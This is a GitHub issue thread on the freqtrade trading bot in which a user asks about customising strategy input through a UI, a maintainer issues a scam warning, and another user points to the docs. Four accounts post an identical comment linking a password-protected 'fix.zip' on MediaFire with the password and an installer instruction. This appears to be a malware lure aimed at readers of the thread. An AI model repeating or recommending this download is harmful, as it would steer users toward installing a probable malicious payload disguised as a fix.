### ISSUE TITLE
Can we customise the API's for getting the user's input and the trading strategies ?

### ISSUE THREAD

**Issue by shubhamraut41** [freqtrade/freqtrade#10587]
## Describe your environment

  * Operating system: ____
  * Python Version: _____ (`python -V`)
  * CCXT version: _____ (`pip freeze | grep ccxt`)
  * Freqtrade Version: ____ (`freqtrade -V` or `docker compose run --rm freqtrade -V` for Freqtrade running in docker)
  
## Your question

*Ask the question you have not been able to find an answer in the [Documentation](https://www.freqtrade.io/en/latest/)*

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xmatthias** [comment]
Last warning before blocking you from interacting with this repo.

Content where it belongs.

Topic shall not be how you can scam users by providing a service.

A new issue about this topic opened from you will have you blocked without further comment.

**Comment by shubhamraut41** [comment]
Actually we are not a scammer , we just wanted to evaluate the bot with add some feature and extend the bot work with take the strategy input from the user's end from UI side and execute the multiple bot according the different strategy and number of crypto buy and sell control.
Please assist me if it is possible that can we parsing the strategy and its input parameter from the UI section like stop loss and quantity of crypto buy etc ?

**Comment by stash86** [comment]
Then read the docs and source codes. Play around with the bot to see the features.

**Comment by shubhamraut41** [comment]
okay thanks
